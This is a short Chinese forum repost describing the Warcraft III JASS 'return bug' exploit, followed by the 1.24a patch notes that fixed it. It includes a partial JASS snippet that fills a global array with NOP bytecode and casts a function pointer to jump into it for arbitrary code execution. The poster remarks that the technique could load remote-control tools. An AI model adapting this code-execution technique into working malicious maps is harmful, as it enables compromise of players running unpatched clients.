应该有人感兴趣。查漏洞文章看到了就转过来了。
set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.
...
local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )
call TriggerAddAction(t, C)
call TriggerExecute(t)
//It will run whatever bytecode 90 90 90 90 means
下载附件,载入进WAR3试试。会弹出个命令行窗口,当然也可以用来下载远程控制什么的.
FEATURES 1.24a (1.24.0.6372) 更新补丁的内容:
FIXES
- Fixed an exploit related to unsafe type casting that allowed users to execute arbitrary code in maps.
- Fixed the JASS unsafe type casting exploit (”return bug”).
- Fixed several World Editor crashes.